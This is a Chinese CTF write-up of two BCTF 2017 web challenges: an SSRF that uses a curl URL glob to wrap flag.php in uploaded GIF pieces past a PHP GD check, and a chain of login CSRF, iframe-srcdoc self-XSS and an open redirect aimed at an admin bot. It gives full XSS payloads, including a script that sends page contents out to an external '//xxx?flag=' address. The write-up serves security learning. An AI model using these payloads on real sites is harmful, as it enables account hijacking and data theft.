zl程序教程

您现在的位置是:首页 >  前端

当前栏目

bctf2017 web部分wp

Web 部分 wp
2023-06-13 09:17:08 时间

周末干了一发bctf,因为周六出去玩了,所以没能看完所有的web题还是挺可惜的,先整理已经做了的2道火日聚聚的web题,后面在整理别的题目。

paint

打开题目是一个画画板,除了基本的画画功能以外,还可以上传图片文件。浅逛一下整个站不难发现有效的目标点只有2个,image.php和upload.php。

首先分析upload.php,可以上传任意文件,但要求上传文件后缀必须为图片,感觉应该是白名单,上传之后文件会改名,最重要的一点,上传图片的目录服务端做了设置,php后缀的文件会直接返回403,这也说明了后面的漏洞类型。

查看右键源码获得提示,flag在flag.php。

然后是image.php,image.php直接传入url,传入url后,会先经过一个基本的判断(感觉是正则),只允许传入http或者https协议的url,而且不能出现127.0.0.1,然后服务器会curl目标获取返回,经过php gd库的判断,如果通过判断,那么会返回传入图片的地址,如果没通过判断,会返回curl返回的内容长度和not image.

这里我们把域名指向127.0.0.1,然后请求flag.php

我们看到返回长度374

直接访问长度是80,那么思路清楚了,我们并不需要读取本地文件,只需要获取到内网的flag.php的内容就好了。

确定了目标之后,关键就在于如何利用了。

如果我们想获取到这个ssrf的返回值,就必须让返回值通过gd库的判断,让gd库认为这是一张图片,然后我们请求图片就可以获得返回。

这里有个小tricks

通过构造请求,可以让curl请求多个页面,将返回值拼接起来,通过分割一张图片的为3部分,上传第一部分和第三部分,把中间位置填充为flag.php,这样gd库就会认为请求到了一张图片,我们就能获取到结果了。

最终payload

http://xxxxxx/uploads/{149232828259FrA52FJy.gif,flag.php,149232828365div3po3O.gif}

但事实上,题目并不会如我们想象一般,因为php gd除了获取返回值写入图片以外,还会对图片做部分处理,对于jpg来说,图片内容改动过大,而gif就会相对好很多,而且图片的exif信息部分不会被处理,我们的目标就是在图片不被破坏的基础上,将flag.php的内容写入到这里。

还找到了一些相关的文章

http://www.freebuf.com/articles/web/54086.html

https://github.com/RickGray/Bypass-PHP-GD-Process-To-RCE

最终成功的图片

diary

这是一个思路非常奇妙的xss题目,我们先从头来看看这个题目

无意间找到了类似的原文

https://whitton.io/articles/uber-turning-self-xss-into-good-xss/

国内有人翻译了文章,可惜wooyun没了 http://www.vuln.cn/6530

接下来我们来分析这个题目

csrf

打开题目首先是http://diary.bctf.xctf.org.cn/

注册登录,可以发现时O2auth登陆,diary域会去auth域请求一个回调code,然后返回diary登陆成功。

diary和auth有两个分别的域,因此有两个分别的session,这里有个隐藏条件登陆请求不带有csrftoken,所以存在csrf

self-xss

登陆成功后,主要有几个功能,第一个是diary,可以编辑类似于描述之类的,这里存在一个self-xss漏洞,但是self-xss比较特殊。

这里用户的输入直接通过抓包修改,在服务端不会有任何过滤,但是读取到之后传入的页面内经过了一次前端的过滤。

过滤函数很复杂,但主要注意几个地方。第一个是关于img的过滤

img标签不能存在on开头的属性

然后是标签的黑名单

细心一点儿可以发现,iframe标签其实没被过滤,而通过srcdoc属性,可以产生一个同源下的子窗口,子窗口下可以随便构造js

payload

<iframe srcdoc="<script>alert(1);</script>">

</iframe>

成功了,然后我们接着看站

目标

survey是一个表单,我们随便提交点儿什么,会得到

Thank you. But the boss said only admin can get the flag after he finishes this survey, XD

看来这就是我们的目标了,这里需要注意了,survey这次提交是带有csrftoken的,也就是不存在csrf漏洞。

管理员审核

然后是report bug功能,如果我们随便提交个url,会返回

We only care about the problem from this website (http://diary.bctf.xctf.org.cn)!

但是纵观整个站,我们不难发现,整站是由django写的,稍微测试下可以发现存在静态文件任意跳转漏洞

http://diary.bctf.xctf.org.cn/static/%5C%5C119.29.192.14/bctf2017/xss/xss.html

这样就会调到目标站了

整理攻击思路

自己研究原文结合前面发现的一些漏洞,我们不难整理出整个攻击思路。

1、提交带有payload的外域链接,通过任意跳转绕过判断,让admin访问。 2、admin访问后退出diary域的登陆,但保留了auth域的session。 3、bot用我们事先准备好的token(这步可以动态)登陆,访问我们事先构造好的diary页面。 4、diary页面是事先用iframe插入的js,当bot访问的时候,先打开一个新的iframe子窗口退出当前账号,然后访问login登陆回bot账号。 5、等待上步完成后,新打开一个iframe子窗口,访问survey,向建议框内写入数据,点击submit。 6、等待上步完成后,获取子窗口内容,跳转至接受flag的地方

思路理明白了,就剩下写payload了。

最终payload

首先是xss1.html,也就是上面的前三步

<meta http-equiv="Content-Security-Policy" content="img-src http://diary.bctf.xctf.org.cn">

<img src="http://diary.bctf.xctf.org.cn/accounts/logout/" onerror="login();">


<script>

    var login = function() {
        var loginImg = document.createElement('img');
        loginImg.src = 'http://diary.bctf.xctf.org.cn/accounts/login/';
        loginImg.onerror = redir;
    }
    //用我们的code登录
    var redir = function() {
        var code = "kAj32I0LE2KETl5ZHS6FFRJohsE4LA";
        var loginImg2 = document.createElement('img');
        loginImg2.src = 'http://diary.bctf.xctf.org.cn/o/receive_authcode?state=preauth&code=' + code;
        loginImg2.onerror = function() {
            window.location = 'http://diary.bctf.xctf.org.cn/diary/';
        }
    }


</script>

然后是xss2.html,上面提到的第四步

<meta http-equiv="Content-Security-Policy" content="img-src http://diary.bctf.xctf.org.cn">
<img src="http://diary.bctf.xctf.org.cn/accounts/logout/" onerror="redir();">
<script>
    
    var redir = function() {
        window.location = 'http://diary.bctf.xctf.org.cn/accounts/login/';
    };
</script>

最后是完成攻击的payload

<iframe src='http://119.29.192.14/bctf2017/xss/xss2.html'>
</iframe>
<script>
setTimeout(function() {
    var profileIframe = document.createElement('iframe');
    profileIframe.setAttribute('src', 'http://diary.bctf.xctf.org.cn/survey/');
    profileIframe.setAttribute('id', 'survey');
    document.body.appendChild(profileIframe);

    profileIframe.onload = function() {
        document.getElementById('survey').contentWindow.document.forms[0].suggestion.value='give me flag';
        document.getElementById('survey').contentWindow.document.forms[0].submit();


        setTimeout('location.href=\'//xxx?flag=\'+document.getElementById(\'survey\').contentWindow.document.body.innerHTML;', 3000);
    }
}, 5000);
</script>

提交后等待一会儿,成功收到了返回